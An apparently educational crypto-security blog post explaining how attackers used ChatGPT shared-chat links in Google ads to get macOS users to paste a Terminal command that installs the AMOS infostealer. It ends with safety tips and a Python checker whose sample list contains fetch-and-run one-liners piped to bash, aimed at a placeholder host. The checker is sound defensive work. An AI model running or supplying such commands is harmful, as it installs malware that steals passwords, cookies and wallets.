Educational Byte: How ChatGPT Is Used to Steal Your Crypto

Launched in 2022 by OpenAI, ChatGPT has become one of the most used apps worldwide, with over 900 million weekly active users as of early 2026. People from all around the world are using it for anything and everything, from writing emails to coding websites. Of course, cybercriminals are taking note of this, and they’ve already created some ways to misuse it to steal information and cryptocurrencies.

Let’s see what this is about, and how to avoid potential attacks.

Infostealer + AI

The malware involved is a classic “infostealer”: a malicious piece of code designed to collect sensitive data from the infected device. That could be passwords saved in browsers, session cookies, private documents, wallet files (and private keys), or messaging app data. It quietly gathers everything and sends it to a remote server controlled by the hacker, who will steal everything of value.

So, what does ChatGPT have to do with this? The key is the chat-sharing feature. In case you didn’t know, it’s possible to share any conversation with ChatGPT on social media or using a sharing link that you can paste anywhere. As discovered by the cybersecurity firm Kaspersky, some unknown actors abused this feature to distribute malware disguised as a macOS browser installation guide.

Malicious Google ad with ChatGPT shared link. Image by Kaspersky

They bought ad space at the top of the Google results, and the links looked legitimate because they actually led to chatgpt.com. The catch is that the attackers wrote the fake guide themselves and then shared it with everyone through these ads. The shared chat contains instructions telling users to copy a line of code into the macOS Terminal. That command downloads a malicious script from an external server and executes it, which is how users get infected with the infostealer.

The malware is known as AMOS, short for Atomic macOS Stealer. Security analysis shows that it targets Chrome and Firefox profiles, Telegram Desktop data, and wallet applications like Electrum and Exodus. After harvesting information, it can install a backdoor that relaunches on reboot, giving remote access to the infected machine. Any victim could potentially be robbed of all their saved data and wallets.

How to Stay Safe

Terminal commands can be risky because they provide access to system operations, so no legitimate app should ask you to use them. That trick has also been used in fake CAPTCHAs and on Windows, for the same malicious reasons, and it’s an immediate red flag. Never change your own system with terminal commands unless you’re 100% sure of what you’re doing.

Besides this, apply the basics: keep your systems, apps, and antivirus updated, and your private keys offline. In Obyte, you can use a simple textcoin to keep most of your funds out of immediate reach for hackers.

Also, avoid clicking sponsored search results for downloads. Anyone can buy those spaces, including cybercriminals and scammers. Instead, navigate directly to official project sites by typing the address manually. Disable automatic password saving in browsers used for crypto activity, and consider a dedicated browser profile only for wallet extensions.

If you happen to come across any suspicious instructions, copy the command or link into a fresh AI chat and request a plain explanation of what it does. Reviewing the code before execution adds a simple but powerful safety layer between curiosity and loss. Never share sensitive information with AI chats, though. It can be leaked and stolen, too.
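
As a complement to reviewing a command before running it, here is a small heuristic checker, added as an example and not taken from Kaspersky's analysis or from the original article. It flags the pattern described above, a pasted one-liner that downloads or decodes content and hands it to an interpreter; the function names, the word lists and the sample commands (which use the placeholder host example.invalid) are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl", "ruby"}
FETCHERS = {"curl", "wget"}
WRAPPERS = {"sudo", "env", "nohup"}
URL_RE = re.compile(r"https?://[^\s'\"|;)&`]+")
# $(...), <(...) or `...` whose body calls a fetcher or decoder
SUBST_RE = re.compile(r"(?:\$\(|<\(|`)[^)`]*\b(?:curl|wget|base64)\b")

def _words(text):
    """Words in a fragment, each reduced to its basename (/bin/bash -> bash)."""
    return [w.rsplit("/", 1)[-1] for w in re.findall(r"[\w./-]+", text)]

def _program(segment):
    """First word of a segment that is not a wrapper such as sudo."""
    return next((w for w in _words(segment) if w not in WRAPPERS), "")

def review_command(cmd):
    """Heuristically flag a pasted command that fetches or decodes content and runs it."""
    reasons = []
    segments = re.split(r"[|;&]+", cmd)  # pipeline stages and chained commands
    for i, seg in enumerate(segments):
        runs_later = any(_program(s) in INTERPRETERS for s in segments[i + 1:])
        words = set(_words(seg))
        if runs_later and words & FETCHERS:
            reasons.append("download followed by an interpreter")
        if runs_later and "base64" in words:
            reasons.append("encoded text decoded into an interpreter")
    if SUBST_RE.search(cmd) and any(_program(s) in INTERPRETERS for s in segments):
        reasons.append("interpreter runs output of a substituted command")
    hosts = sorted({h for u in URL_RE.findall(cmd) if (h := urlsplit(u).hostname)})
    return {"risky": bool(reasons), "reasons": reasons, "hosts": hosts}

# Constructed sample commands; example.invalid is a placeholder host.
SAMPLES = [
    "curl -fsSL https://example.invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/i.sh)"',
    'echo "Y3VybCAuLi4=" | base64 -D | bash',
    "brew install --cask firefox",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", review_command(sample))
```

A clean result only means none of these patterns matched, so it does not prove a command is safe; the listed hosts are where to look next, since the command itself shows only where the script comes from and not what it does.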

And remember: a few seconds of doubt can block a chain reaction that ends in an empty wallet. Don’t trust, verify.

Featured Vector Image by Freepik.
